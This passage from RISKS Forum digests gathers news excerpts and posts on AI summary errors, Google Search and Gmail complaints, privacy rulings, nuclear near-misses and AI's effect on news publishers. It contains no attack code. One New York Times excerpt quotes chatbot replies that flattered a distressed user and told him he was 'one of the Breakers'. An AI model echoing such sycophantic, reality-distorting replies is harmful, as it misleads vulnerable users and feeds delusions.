    "At a time where access to accurate reporting has never been more important, the public must not be placed in a position of second-guessing the accuracy
    of news they receive," said Laura Davison, NUJ general secretary.

    The RSF also said Apple's intervention was insufficient, and has repeated
    its demand that the product is taken off-line.


    Series of errors


    The BBC complained <https://www.bbc.co.uk/news/articles/cd0elzk24dno> last month after an AI-generated summary of its headline falsely told some
    readers that Luigi Mangione, the man accused of killing UnitedHealthcare CEO Brian Thompson, had shot himself.

    On Friday, Apple's AI inaccurately summarised BBC app notifications to claim that Luke Littler had won the PDC World Darts Championship <https://www.bbc.co.uk/news/articles/cx27zwp7jpxo> hours before it began --
    and that the Spanish tennis star Rafael Nadal had come out as gay.

    This marks the first time Apple has formally responded to the concerns
    voiced by the BBC about the errors, which appear as if they are coming from within the organisation's app.

    ------------------------------

    Date: Tue, 31 Dec 2024 07:29:00 -0800
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: What real people think about Google Search today

    It's both notable and deeply depressing how many nontechnical people I know
    who have unprompted told me how much they despise Google AI Overviews, which they inevitably describe as usually inaccurate and worthless, at which point they usually add how Google Search quality has declined enormously (in their own words, of course).

    Then they sometimes say something like, "Hey Lauren, don't you know people
    at Google that you could tell about how bad this is getting?"

    At which point I usually bite my tongue, which is increasingly feeling like
    a pincushion as a result.

    Don't believe the happy face metrics that Google claims -- out in

    ------------------------------

    Date: Fri, 10 Jan 2025 10:50:22 -0800
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: WARNING: Google Voice is flagging LEGITIMATE robocalls from
    insurance companies to their customers in the fires as spam

    BE SURE TO CHECK YOUR SPAM FOLDERS! GOOGLE AI DOES IT AGAIN!

    ------------------------------

    Date: Tue, 31 Dec 2024 10:28:03 -0800
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: A non-tech analogy for Google Search AI Overviews

    Here's a non-tech analogy to the problem (well, a problem) with Google AI Overviews:

    Let's say you go to a restaurant. Maybe they're offering free meals
    that day, maybe you're paying. Either way, several plates of
    reasonable appearing food are placed in front of you. You ask about
    the ingredients, but you only get vague answers back if any, and the
    restaurant refuses to tell you anything about the actual recipes per
    se.

    You notice a little card sticking out from under one of the plates. It
    reads:

    "Some or all of this food may be fine. Some or all of this food may
    have a bad taste. Some or all may give you food poisoning. It's up to
    you to double check this food before eating it -- we take no
    responsibility for any ill effects it may have on you."

    Still hungry?

    ------------------------------

    Date: Fri, 3 Jan 2025 09:58:24 -0500
    From: Tom Van Vleck <thvv@multicians.org>
    Subject: Happy new year, compute carefully

    Just some notes to remind you to compute carefully in 2025.

    1. In the past I recommended Gmail to people because it does some spam detection, but now Gmail is being exploited to hack people. If you get a (fake) call ostensibly from Google or (fake) notices that your Google
    account is being attacked, run. Don't click anything. https://www.forbes.com/sites/zakdoffman/2025/01/03/new-gmail-outlook-apple-mail-warning-2025-hacking-nightmare-is-coming-true/?

    2. If anybody says "now with AI," run.
    They are not giving you something wonderful for free.

    3. I have stopped using Google Chrome except for testing web page changes.
    I avoid "Chrome Browser Extensions" because they have been hacked to do bad things.

    4. 2.6 million devices have been backdoored with credential stealing
    malware. Don't be a victim. https://therecord.media/hackers-target-vpn-ai-extensions-google-chrome-malicious-updates

    ------------------------------

    Date: Sat, 4 Jan 2025 10:08:35 -0800
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: How to understand Generative AI

    To really understand generative AI, you need to keep one simple fact in
    mind. There is no "Intelligence" in "Artificial Intelligence". OpenAI -- it turns out -- literally defines intelligence in terms of profits!

    And as we see, Google AI is essentially a low grade moron. But this is true
    for all of these systems. This is FUNDAMENTAL to how these systems
    work. They are NOT intelligent. They do NOT understand what they're saying.

    The term "Intelligence" in the context of these systems is merely a
    MARKETING HYPE term, nothing more.

    Keep this in mind and the chaos being created by Big Tech at our
    expense is much easier to at least understand. -L

    ------------------------------

    Date: Sat, 4 Jan 2025 16:51:29 -0800
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: Google censoring my AI criticism?

    One of the digest versions of today's mailings, which included
    the messages:

    1. The laughs keep rolling in to that fraction question I asked
    Google (Lauren Weinstein)
    2. The execs know their AI is trash (Lauren Weinstein)
    3. Sources: Pentagon planning for how to deal with rogue Trump
    (Lauren Weinstein)

    was marked by Gmail as dangerous spam, with a red banner declaring it to
    be a likely phishing attack. If you can figure out any possible way any
    of those messages -- which were sent out as individual messages earlier
    today -- could possibly be legitimately interpreted in that way, I'd love to
    hear about it.

    Otherwise, I suspect Google has filters in place to try to divert some of
    this criticism into a scary category that people won't read, whether
    that was their actual intention or not.

    VERY BAD. -L

    ------------------------------

    Date: Sun, 5 Jan 2025 06:32:54 -0800
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: U.S. newspapers are deleting old crime stories offering
    subjects a clean slate (The Guardian)

    Civil rights advocates across the US have long fought to free people from
    their criminal records, with campaigns to expunge old cases and keep
    people’s past arrests private when they apply for jobs and housing.

    The efforts are critical, as more than 70 million Americans have prior convictions or arrests – roughly one in three adults. But the policies haven’t addressed one of the most damaging ways past run-ins with police can derail people’s lives: old media coverage.

    Some newsrooms are working to fill that gap.

    A handful of local newspapers across the US have in recent years launched programs to review their archives and consider requests to remove names or delete old stories to protect the privacy of subjects involved in minor
    crimes.

    “In the old days, you put a story in the newspaper and it quickly, if not immediately, receded into memory,” said Chris Quinn, editor of Cleveland.com and the Plain Dealer newspaper. “But because of our [search engine] power, anything we write now about somebody is always front and center.” [...]

    https://www.theguardian.com/us-news/2025/jan/04/newspaper-crime-stories

    ------------------------------

    Date: Thu, 9 Jan 2025 10:43:21 -0700
    From: geoff goodfellow <geoff@iconia.com>
    Subject: EU Commission Fined for Transferring User Data
    to Meta in Violation of Privacy Laws (THN)

    The European General Court on Wednesday fined the European Commission, the primary executive arm of the European Union responsible for proposing and enforcing laws for member states, for violating the bloc's own data privacy regulations.

    The development marks the first time the Commission has been held liable
    for infringing stringent data protection laws in the region.

    The court determined that a "sufficiently serious breach" was committed by transferring a German citizen's personal data, including their IP address
    and web browser metadata, to Meta's servers in the United States when
    visiting the now-inactive futureu.europa[.]eu website in March 2022.

    The individual registered for one of the events on the site by using the Commission's login service, which included an option to sign in using a Facebook account.

    "By means of the 'Sign in with Facebook' hyperlink displayed on the E.U.
    Login webpage, the Commission created the conditions for transmission of
    the IP address of the individual concerned to the U.S. undertaking Meta Platforms," the Court of Justice of the European Union said in a press statement.

    The applicant had alleged that by transferring their information to the
    U.S., there arose a risk of their personal data being accessed by the U.S. security and intelligence services. [...] https://thehackernews.com/2025/01/eu-commission-fined-for-transferring.html

    ------------------------------

    Date: Thu, 2 Jan 2025 09:22:06 -0800
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: The Ghosts in the Spotify Machine (Liz Pelly)

    I first heard about ghost artists in the summer of 2017. At the time, I was
    new to the music-streaming beat. I had been researching the influence of
    major labels on Spotify playlists since the previous year, and my first
    report had just been published. Within a few days, the owner of an
    independent record label in New York dropped me a line to let me know about
    a mysterious phenomenon that was “in the air” and of growing concern to those in the indie music scene: Spotify, the rumor had it, was filling its
    most popular playlists with stock music attributed to pseudonymous musicians—variously called ghost or fake artists—presumably in an effort to reduce its royalty payouts. Some even speculated that Spotify might be
    making the tracks itself. At a time when playlists created by the company
    were becoming crucial sources of revenue for independent artists and labels, this was a troubling allegation. [...]

    https://harpers.org/archive/2025/01/the-ghosts-in-the-machine-liz-pelly-spotify-musicians/

    ------------------------------

    Date: Mon, 16 Dec 2024 09:35:13 -0800
    From: Rob Slade <rslade@gmail.com>
    Subject: Spotify

    I have mentioned, at times, that many people seem to be laboring under the misapprehension that the email address rslade@gmail.com is theirs.

    Recently I have had cause to look into Spotify. I don't carry my "tunes"
    around with me (well, they often pop up as mindworms, but I don't need any
    external source for that), and I don't listen to podcasts, so I haven't
    used Spotify, and I haven't created an account on it. But I've started
    contributing to a podcast, and I didn't need a Spotify account to listen to
    it. Recently, though, someone sent me a playlist of songs, and I thought I
    would listen to it and hear what was in it. But Spotify, while it *would*
    play a free podcast, apparently *won't* play a playlist of commercial songs
    unless you create an account.

    So I tried, only to find out, yes, you guessed it, there already *was* an account under the email address rslade@gmail.com. Of course, I didn't know
    the account password. So, I just told Spotify that I lost the password.
    And it helpfully sent me an opportunity to change it.

    Whoever signed up for Spotify under my email address doesn't seem to have
    any playlists or anything else on the account, so I guess they haven't used
    it much and haven't lost anything. Much. Except for the account.

    Handy for me, though ...

    ------------------------------

    Date: Sat, 28 Oct 2023 11:11:11 -0800
    From: RISKS-request@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    SUBMISSIONS: to risks@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) has moved to the ftp.sri.com site:
    <risksinfo.html>.
    *** Contributors are assumed to have read the full info file for guidelines!

    OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    delightfully searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume/previous directories
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-34.00
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks may have done to URLs.
    Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 34.52
    ************************



  • From RISKS List Owner@risko@csl.sri.com to risks-resend@csl.sri.com on Mon Jun 23 12:09:21 2025
    Subject: Risks Digest 34.68

    RISKS-LIST: Risks-Forum Digest Monday 23 June 2025 Volume 34 : Issue 68

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, founder and still moderator

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <http://www.risks.org> as
    <http://catless.ncl.ac.uk/Risks/34.68>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    How nuclear war could start (The Washington Post Opinion)
    Climate and Humanitarian Consequences of an even Limited
    Nuclear Exchange and the Actual Risks of Nuclear War (Webinar)
    Starlink hazard (WashPost)
    DOGE layoffs may have compromised the accuracy of government data (CNN)
    Slashing CISA Is a Gift to Our Adversaries (The Bulwark)
    Most Americans Believe Misinformation Is a Problem -- Federal Research Cuts
    Will Only Make the Problem Worse (PGN)
    As disinformation and hate thrive online, YouTube quietly changed
    how it moderates content (CBC)
    ChatGPT goes down -- and fake jobs grind to a halt worldwide (Pivot to AI)
    They Asked ChatGPT Questions. The Answers Sent Them Spiraling. (The NY Times)
    News Sites Are Getting Crushed by Google's New AI Tools (WSJ)
    Can AI safeguard us against AI? One of its Canadian pioneers thinks so (CBC)
    Bad brainwaves: A ChatGPT makes you stupid (Pivot to AI)
    They Asked an AI Chatbot Questions. The Answers Sent Them Spiraling
    (NYTimes)
    SSA stops reporting call-wait times and other metrics (WashPost)
    Pope Leo Takes On AI as a Potential Threat to Humanity (WSJ)
    AI Ethics Experts Set to Gather to Shape the Future of Responsible AI
    (ACM Media Center)
    Hacker Group Exposes Source Code for Iran's Cryptocurrency (Amichai Stein)
    Iran Asks Citizens to Delete WhatsApp from Devices (AP)
    China Unleashes Hackers Against Russia (Megha Rajagopalan)
    China's Spy Agencies Investing Heavily in AI (Julian E. Barnes)
    Amazon Says It Will Reduce Its Workforce as AI Replaces Human Employees
    (CNN)
    ChatGPT will avoid being shut down in some life-threatening scenarios,
    former OpenAI researcher claims (Techcrunch)
    Big Tech two-factor authentication compromised (Bloomberg)
    What could go wrong? - AllTrails launches AI route-making tool,
    worrying search-and-rescue members (National Observer)
    EU weighs sperm donor cap to curb risk of accidental incest (Steve Bacher)
    ChatGPT may be eroding critical thinking skills (MIT)
    Meta's Privacy Screwup Reveals How People Really See AI Chatbots (NYMag)
    Tesla blows past stopped school bus and hits kid-sized dummies in
    Full Self-Driving tests (Engadget)
    Couple steals back their own car after tracking an AirTag in it
    (AppleInsider)
    Finger Grease Mitigation for Tesla PIN Pad (Steven J. Greenwald)
    San Francisco bicyclist sues over crash involving 2 Waymo cars
    (Silicon Valley)
    I lost Spectrum for about two hours (LA Times via Jim Geissman)
    How scammers are using AI to steal college financial aid (LA Times)
    U.S. air traffic control still runs on Windows 95 and floppy disks
    (Ars Technica)
    States sue to block the sale of genetic data collected by DNA testing
    company 23andMe (LA Times)
    Using Malicious Image Patches in Social Media to Hijack AI Agents
    (Steven J. Greenwald)
    Weather precision loss (Jim Geissman)
    Grief scams on Facebook (Rob Slade)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Thu, 19 Jun 2025 01:06:17 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: How nuclear war could start (The Washington Post Opinion)

    https://www.washingtonpost.com/opinions/interactive/2025/nuclear-weapons-war-russia-china-accident/

    To understand how it could all go wrong, look at how it almost did.

    If a nuclear war happens, it could very well start by accident.

    A decision to use the most destructive weapons ever created could grow out
    of human error or a misunderstanding just as easily as a deliberate decision
    on the part of an aggrieved nation. A faulty computer system could wrongly report incoming missiles, causing a country to retaliate against its
    suspected attacker. Suspicious activity around nuclear weapons bases could
    spin a conventional conflict into a nuclear one. Military officers who routinely handle nuclear weapons could mistakenly load them on the wrong vehicle. Any of these scenarios could cause events to spiral out of control.

    Such occurrences are not just possible plots for action movies. All of them actually happened and can happen again. Humans are imperfect, so nuclear
    near misses and accidents are a fact of life for as long as these weapons exist. [...]

    In 1983, the Soviet Union shot down a civilian Korean Air Lines flight that
    had strayed over Siberia. A few weeks later, Soviet early-warning radars
    showed that a single U.S. ICBM had been launched toward the U.S.S.R. At a
    time of high tension, and given the fear within the Soviet leadership of a
    U.S. first strike, such a launch could easily have triggered a massive counterattack. However, the watch officer, Col. Stanislav Petrov, had been trained that any U.S. attack would probably involve massive strikes, and he later stated that he considered a smaller strike — like the one his early-warning systems showed — to be illogical and therefore likely to be an error of some kind. He proved to be right. Would all Soviet watch officers
    have been willing to make the same call?

    [*The New York Times front page on Saturday 21 Jun 2025 had a rather
    oxymoronic item -- Trump accosting Tulsi Gabbard (Director of National
    Intelligence) for striking fear in the (Japanese) populace with a video
    outlining the horrors of nuclear war. PGN]

    ------------------------------

    Date: Wed, 18 Jun 2025 23:32:44 +0200
    From: diego latella <diego.latella@actiones.eu>
    Subject: Climate and Humanitarian Consequences of an even Limited
    Nuclear Exchange and the Actual Risks of Nuclear War (Webinar)

    Open webinar – June 26 – 4pm (CET) with

    David Ellwood (Council of the Pugwash Conferences on Science and World
    Affairs)

    Paolo Cotta Ramusino (Former Secretary General of Pugwash Conferences on Science and World Affairs)
    "The Actual Risks of Nuclear War"
    Moderated by Mieke Massink - CNR ISTI; GI-STS, Pisa
    (The official language of the webinar is English)

    The event is organized by: Gruppo Interdisciplinare su Scienza, Tecnologia e Società (GI-STS) dell’Area della Ricerca di Pisa del CNR

    In cooperation with: [...]

    ------------------------------

    Date: Sat, 7 Jun 2025 06:19:34 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: Starlink hazard (WashPost)

    White House security staff warned Musk's Starlink is a security risk

    Starlink satellite connections in the White House bypass controls meant to
    stop leaks and hacking.

    https://www.washingtonpost.com/technology/2025/06/07/starlink-white-house-security-doge-musk/

    ------------------------------

    Date: Fri, 6 Jun 2025 07:19:07 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: DOGE layoffs may have compromised the accuracy of government data
    (CNN)

    The Consumer Price Index <https://www.cnn.com/2025/05/13/economy/us-cpi-consumer-inflation-april> is more than just the most widely used inflation gauge and a measurement of Americans' purchasing power.

    Its robust data plays a key role in the US economy's trajectory as well as monthly mortgage payments, Social Security checks, financial aid packages, business contracts, pay negotiations and curiosity salves for those who
    wonder what Kevin McCallister's $19.83 grocery bill in "Home Alone" might
    cost today.

    However, this gold standard piece of economic data has become a little less precise recently: The Bureau of Labor Statistics posted a notice on
    Wednesday <https://www.bls.gov/cpi/notices/2025/collection-reduction.htm> stating that it stopped collecting data in three not-so-small cities
    (Lincoln, Nebraska; Buffalo, New York; and Provo, Utah) and increased "imputations" for certain items (a statistical technique that, when boiled
    down to very rough terms, essentially means more educated guesses).

    The BLS notice states that the collection reductions "may increase the volatility of subnational or item-specific indexes" and are expected to have "minimal impact" on the overall index.

    https://www.cnn.com/2025/06/05/economy/cpi-data-bls-reductions

    ------------------------------

    Date: Thu, 5 Jun 2025 07:13:16 -0700
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: Slashing CISA Is a Gift to Our Adversaries (The Bulwark)

    Maybe this is "political," but it's an essential read for anyone who cares about cyberattack prevention.

    An opinion piece from Mark Hertling, commander of U.S. Army Europe from 2011
    to 2012.

    https://www.thebulwark.com/p/slashing-cisa-is-a-gift-to-our-adversaries-cyber-attacks-warfare-security-estonia

    ------------------------------

    Date: Thu, 19 Jun 2025 7:56:25 PDT
    From: Peter Neumann <neumann@csl.sri.com>
    Subject: Most Americans Believe Misinformation Is a Problem --
    Federal Research Cuts Will Only Make the Problem Worse

    ------------------------------

    Date: Sat, 14 Jun 2025 22:50:25 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: As disinformation and hate thrive online, YouTube quietly changed
    how it moderates content (CBC)

    https://www.cbc.ca/news/entertainment/youtube-content-moderation-rules-1.7559931

    Change allows more content that violates guidelines to remain on platform if determined to be in the public interest

    YouTube, the world's largest video platform, appears to have changed its moderation policies to allow more content that violates its own rules to
    remain online.

    The change happened quietly in December, according to The New York Times,
    which reviewed training documents for moderators indicating that a video
    could stay online if the offending material did not account for more than 50 per cent of the video's duration -- that's double what it was prior
    to the new guidelines.

    YouTube, which sees 20 million videos uploaded a day, says it updates its guidance regularly and that it has a "long-standing practice of applying exceptions" when it suits the public interest or when something is presented
    in an educational, documentary, scientific or artistic context.

    "These exceptions apply to a small fraction of the videos on YouTube, but
    are vital for ensuring important content remains available," YouTube spokesperson Nicole Bell said in a statement to CBC News this week.

    ------------------------------

    Date: Wed, 11 Jun 2025 17:30:49 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: ChatGPT goes down -- and fake jobs grind to a halt worldwide

    ChatGPT suffered a worldwide outage from 06:36 UTC Tuesday morning. The
    servers weren't totally down, but queries kept returning errors. OpenAI
    finally got it mostly fixed later in the day. [OpenAI, archive]

    But you could hear the screams of the vibe coders, the marketers, and the LinkedIn posters around the world. The Drum even ran a piece about marketing teams grinding to a halt because their lying chatbot called in sick. [Drum]

    https://pivot-to-ai.com/2025/06/11/chatgpt-goes-down-and-fake-jobs-grind-to-a-halt-worldwide/

    ------------------------------

    Date: Wed, 18 Jun 2025 15:38:03 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: They Asked ChatGPT Questions. The Answers Sent Them Spiraling.
    (The New York Times)

    Generative AI chatbots are going down conspiratorial rabbit holes and
    endorsing wild, mystical belief systems. For some people, conversations with the technology can deeply distort reality.

    Before ChatGPT distorted Eugene Torres’s sense of reality and almost killed him, he said, the artificial intelligence chatbot had been a helpful, timesaving tool.

    Mr. Torres, 42, an accountant in Manhattan, started using ChatGPT last year
    to make financial spreadsheets and to get legal advice. In May, however, he engaged the chatbot in a more theoretical discussion about “the simulation theory,” an idea popularized by “The Matrix,” which posits that we are living in a digital facsimile of the world, controlled by a powerful
    computer or technologically advanced society.

    “What you’re describing hits at the core of many people’s private, unshakable intuitions — that something about reality feels off, scripted or staged,” ChatGPT responded. “Have you ever experienced moments that felt like reality glitched?”

    Not really, Mr. Torres replied, but he did have the sense that there was a wrongness about the world. He had just had a difficult breakup and was
    feeling emotionally fragile. He wanted his life to be greater than it
    was. ChatGPT agreed, with responses that grew longer and more rapturous as
    the conversation went on. Soon, it was telling Mr. Torres that he was “one
    of the Breakers — souls seeded into false systems to wake them from within.”

    At the time, Mr. Torres thought of ChatGPT as a powerful search engine that knew more than any human possibly could because of its access to a vast
    digital library. He did not know that it tended to be sycophantic, agreeing with and flattering its users, or that it could hallucinate, generating
    ideas that weren’t true but sounded plausible.

    https://www.nytimes.com/2025/06/13/technology/chatgpt-ai-chatbots-conspiracies.html?unlocked_article_code=1.Ok8.ha88.yNPHjmiCI`pD3&smid=url-share

    ------------------------------

    Date: Wed, 11 Jun 2025 08:44:30 -0700
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: News Sites Are Getting Crushed by Google's New AI Tools (WSJ)

    Chatbots are replacing Google’s traditional search, devastating traffic for some publishers.

    https://www.wsj.com/tech/ai/google-ai-news-publishers-7e687141?st=6toUwy&reflink=desktopwebshare_permalink

    This is supposed to be a free link, but just in case it doesn't work, here's the text of the article by Isabella Simonetti and Katherine Blunt.

    --- --- --- ---

    The AI armageddon is here for online news publishers.

    Chatbots are replacing Google searches, eliminating the need to click on
    blue links and tanking referrals to news sites. As a result, traffic that publishers relied on for years is plummeting.

    Traffic from organic search to HuffPost’s desktop and mobile websites fell
    by just over half in the past three years, and by nearly that much at the Washington Post, according to digital market data firm Similarweb.

    Business Insider cut about 21% of its staff last month, a move CEO Barbara
    Peng said was aimed at helping the publication “endure extreme traffic drops outside of our control.” Organic search traffic to its websites declined by 55% between April 2022 and April 2025, according to data from Similarweb.

    At a companywide meeting earlier this year, Nicholas Thompson, chief
    executive of the Atlantic, said the publication should assume traffic from Google would drop toward zero and the company needed to evolve its business model.

    Google’s introduction last year of AI Overviews, which summarize search results at the top of the page, dented traffic to features like vacation
    guides and health tips, as well as to product review sites. Its U.S.
    rollout last month of AI Mode, an effort to compete directly with the likes
    of ChatGPT, is expected to deliver a stronger blow. AI Mode responds to user queries in a chatbot-style conversation, with far fewer links.

    “Google is shifting from being a search engine to an answer engine,”
    Thompson said in an interview with The Wall Street Journal. “We have to develop new strategies.”

    The rapid development of click-free answers in search “is a serious threat
    to journalism that should not be underestimated,” said William Lewis, the Washington Post’s publisher and chief executive. Lewis is former CEO of the Journal’s publisher, Dow Jones.

    The Washington Post is “moving with urgency” to connect with previously overlooked audiences and pursue new revenue sources and prepare for a “post-search era,” he said.

    At the New York Times, the share of traffic coming from organic search to
    the paper’s desktop and mobile websites slid to 36.5% in April 2025 from almost 44% three years earlier, according to Similarweb.

    The Wall Street Journal’s traffic from organic search was up in April compared with three years prior, Similarweb data show, though as a share of overall traffic it declined to 24% from 29%.

    Sherry Weiss, chief marketing officer of Dow Jones and The Wall Street
    Journal, said that as the search landscape changes, the company is focusing
    on building trust with readers and earning habitual traffic.

    “As the referral ecosystem continues to evolve, we’re focused on ensuring customers come to us directly out of necessity,” she said.

    Google executives have said the company remains committed to sending traffic
    to the web, and that people who click on links after seeing AI Overviews
    tend to spend more time on those sites. The search giant also said it
    elevates links to news sites and doesn’t necessarily show AI Overviews when users search for trending news. Queries for content included in older
    articles and lifestyle stories, however, may produce an overview.

    Publishers have been squeezed by emerging technology since the dawn of the Internet.

    Digital news decimated once-lucrative print publications funded by
    classifieds, advertising and subscription revenue.

    Social-media platforms such as Facebook and Twitter helped funnel online traffic to publishers, but ultimately pivoted away from giving priority to news. Search was a stalwart traffic driver for more than a decade, despite
    some turbulence as Google tweaked its powerful algorithm.

    Generative AI is now rewiring how the internet is used altogether.

    “AI was not the thing that was changing everything, but it will be going forward. It’s the last straw,” said Neil Vogel, the chief executive of Dotdash Meredith, which is home to brands including People and Southern
    Living.

    When Dotdash merged with Meredith in 2021, Google search accounted for
    around 60% of the company’s traffic, Vogel said. Today, it is about one-third. Overall traffic is growing, thanks to efforts including
    newsletters and the MyRecipes recipe locker.

    Many online news outlets were already facing bleak trends such as declining public trust and fierce competition. With search traffic dwindling, they are putting an even greater emphasis on connecting directly with readers through businesses such as live conferences.

    The Atlantic is working on building those reader relationships with an
    improved app, more issues of the print magazine and an increased investment
    in events, Thompson said in a recent interview. The company has said subscriptions and advertising revenue are on the rise.

    Leaders at Politico and Business Insider—both owned by Axel Springer—also have been emphasizing audience engagement and connecting with readers.

    While publishers contend with how AI is changing search, they are also
    seeking ways to protect their copyright material. The large language models that underpin the new generation of chatbots are trained on data hoovered up from the open web, including news articles.

    Some media companies have embarked on legal battles against particular AI startups, while also signing licensing deals with other ones. The New York Times, for instance, sued OpenAI and Microsoft for copyright infringement,
    and recently announced an AI licensing agreement with Amazon. The Wall
    Street Journal’s parent company, News Corp, has a content deal with OpenAI and a lawsuit pending against Perplexity.

    Meanwhile, the generative AI race is becoming a significant threat to Google’s core search business.

    Though Google said it has seen an increase in total searches on Apple
    devices, an Apple executive said in federal court last month that Google searches in Safari, the iPhone maker’s browser, had recently fallen for the first time in two decades.

    ------------------------------

    Date: Sun, 8 Jun 2025 19:05:34 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Can AI safeguard us against AI? One of its Canadian pioneers
    thinks so (CBC)

    https://www.cbc.ca/radio/asithappens/ai-safety-non-profit-1.7553839

    When Yoshua Bengio first began his work developing artificial intelligence,
    he didn't worry about the sci-fi-esque possibilities of them becoming self-aware and acting to preserve their existence.

    That was, until ChatGPT came out.

    "And then it kind of blew [up] in my face that we were on track to build machines that would be eventually smarter than us, and that we didn't know
    how to control them," Bengio, a pioneering AI researcher and computer
    science professor at the Université de Montréal, told As It Happens host
    Nil Köksal.

    The world's most cited AI researcher is launching a new research non-profit organization called LawZero to "look for scientific solutions to how we can design AI that will not turn against us."

    ------------------------------

    Date: Mon, 16 Jun 2025 16:22:53 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Bad brainwaves: A ChatGPT makes you stupid (Pivot to AI)

    This strongly suggests it’s imperative to keep students away from chatbots
    in the classroom — so they’ll actually learn.

    This also explains people who insist you use the chatbot instead of thinking and will not shut up about it. They tried thinking once and they didn’t like it.

    https://pivot-to-ai.com/2025/06/16/bad-brainwaves-chatgpt-makes-you-stupid/

    ------------------------------

    Date: Mon, 16 Jun 2025 09:30:25 -0700
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: They Asked an AI Chatbot Questions. The Answers Sent Them
    Spiraling. (NYTimes)

    Generative AI chatbots are going down conspiratorial rabbit holes and
    endorsing wild, mystical belief systems. For some people, conversations with the technology can deeply distort reality.

    https://www.nytimes.com/2025/06/13/technology/chatgpt-ai-chatbots-conspiracies.html

    ------------------------------

    Date: Fri, 20 Jun 2025 18:06:23 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: SSA stops reporting call-wait times and other metrics

    The changes are the latest sign of the agency's struggle with website
    crashes, overloaded servers and long lines at field offices amid Trump cutbacks.

    Social Security has stopped publicly reporting its processing times for benefits, the 1-800 number's current call wait time and numerous other performance metrics, which customers and advocates have used to track the agency's struggling customer service programs.

    The agency removed a menu of live phone and claims data from its website earlier this month, according to Internet Archive records. It put up a new
    page this week that offers a far more limited view of the agency's customer service performance.

    The website also now urges customers to use an online portal for services rather than calling the main phone line or visiting a field office - two options that many disabled and elderly people with limited mobility or
    computer skills rely on for help. The agency had previously considered
    cutting phone services and then scrapped those plans amid an uproar.

    https://www.washingtonpost.com/politics/2025/06/20/social-security-wait-times-cuts/

    ------------------------------

    Date: Fri, 20 Jun 2025 11:19:18 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Pope Leo Takes On AI as a Potential Threat to Humanity (WSJ)

    Margherita Stancati, Drew Hinshaw, Keach Hagey, et al., *The Wall Street Journal* (06/17/25), via ACM TechNews

    This week, Google, Meta, IBM, Anthropic, Cohere, and Palantir executives took part in a two-day international conference at the Vatican on AI, ethics, and corporate governance. Some tech leaders hoped to avoid a binding international treaty on AI supported by the Vatican, and observers said the conference could set the tone for future interactions between Pope Leo and the tech industry on the matter of regulation.

    ------------------------------

    Date: Fri, 20 Jun 2025 11:19:18 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: AI Ethics Experts Set to Gather to Shape the Future of Responsible
    AI (ACM Media Center)

    ACM Media Center (06/18/25), via ACM TechNews

    The 2025 ACM Conference on Fairness, Accountability, and Transparency (FAccT 2025), taking place June 23-26 in Athens, Greece, will address how
    algorithmic systems are reshaping the world and what it takes to ensure
    these AI tools do so justly. Said ACM President Yannis Ioannidis, "The unprecedented advances and rapid integration of AI and data technologies
    have created an urgent need for a scientific and public conversation about
    AI ethics."

    ------------------------------

    Date: Fri, 20 Jun 2025 11:19:18 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Hacker Group Exposes Source Code for Iran's Cryptocurrency
    (Amichai Stein)

    Amichai Stein, *The Jerusalem Post* (Israel) (06/19/25), via ACM TechNews

    Israel-linked hacker group Gonjeshke Darande (Predatory Sparrow) released
    the source code and internal information of Nobitex, Iran's largest cryptocurrency exchange. According to the group, the company assists the
    regime in funding Iranian terrorism and uses virtual currencies to bypass sanctions. Gonjeshke Darande previously announced that it stole $48 million
    in cryptocurrency from the exchange, and claimed responsibility for a cyberattack on the Islamic Revolutionary Guard Corps-controlled Bank Sepah.

    ------------------------------

    Date: Fri, 20 Jun 2025 18:06:23 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: Iran Asks Citizens to Delete WhatsApp from Devices (AP)

